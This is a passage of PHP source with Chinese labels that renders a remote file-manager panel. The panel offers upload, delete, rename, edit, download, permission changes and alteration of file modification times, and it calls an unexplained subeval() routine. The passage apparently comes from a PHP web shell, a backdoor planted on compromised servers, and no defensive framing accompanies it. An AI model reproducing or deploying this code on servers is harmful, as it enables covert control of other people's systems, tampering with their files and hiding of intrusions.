  828. echo '<input type="button" value="批量上传" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';
  829. echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
  830. subeval();
  831. echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
  832. echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
  833. echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上传" style="width:50px;"> ';
  834. echo '上传重命名为 <input type="text" name="rename" style="width:128px;">';
  835. echo '</form></div>';
  836. echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
  837. subeval();
  838. echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
  839. echo '<input type="hidden" name="act" id="act" value="">';
  840. echo '<input type="hidden" name="var" id="var" value="">';
  841. echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');">上级目录</a></th><th style="width:8%">操作</th><th style="width:5%">属性</th><th style="width:17%">创建时间</th><th style="width:17%">修改时间</th><th style="width:8%">下载</th>';
  842. if($array) {
  843. asort($array['dir']);
  844. asort($array['file']);
  845. $dnum = $fnum = 0;
  846. foreach($array['dir'] as $path => $name) {
  847. $prem = substr(decoct(fileperms($path)),-4);
  848. $ctime = date('Y-m-d H:i:s',filectime($path));
  849. $mtime = date('Y-m-d H:i:s',filemtime($path));
  850. echo '<tr>';
  851. echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';
  852. echo '<td><a href="javascript:dels(\''.$name.'\');">删除</a> ';
  853. echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">改名</a></td>';
  854. echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
  855. echo '<td>'.$ctime.'</td>';
  856. echo '<td>'.$mtime.'</td>';
  857. echo '<td>-</td>';
  858. echo '</tr>';
  859. $dnum++;
  860. }
  861. foreach($array['file'] as $path => $name) {
  862. $prem = substr(decoct(fileperms($path)),-4);
  863. $ctime = date('Y-m-d H:i:s',filectime($path));
  864. $mtime = date('Y-m-d H:i:s',filemtime($path));
  865. $size = size(filesize($path));
  866. echo '<tr>';
  867. echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';
  868. echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');">编辑</a> ';
  869. echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">改名</a></td>';
  870. echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
  871. echo '<td>'.$ctime.'</td>';
  872. echo '<td>'.$mtime.'</td>';
  873. echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';
  874. echo '</tr>';
  875. $fnum++;
  876. }
  877. }
  878. unset($array);
  879. echo '</table>';
  880. echo '<div class="actall" style="text-align:left;">';
  881. echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
  882. echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","'.$nowdir.'","a");\'> ';
  883. echo '<input type="button" value="删除" style="width:50px;" onclick=\'dels("b");\'> ';
  884. echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> ';
  885. echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","'.$mtime.'","d");\'> ';
  886. echo '目录['.$dnum.'] - 文件['.$fnum.'] - 属性['.$chmod.']</div></form>';
  887. break;
  888. }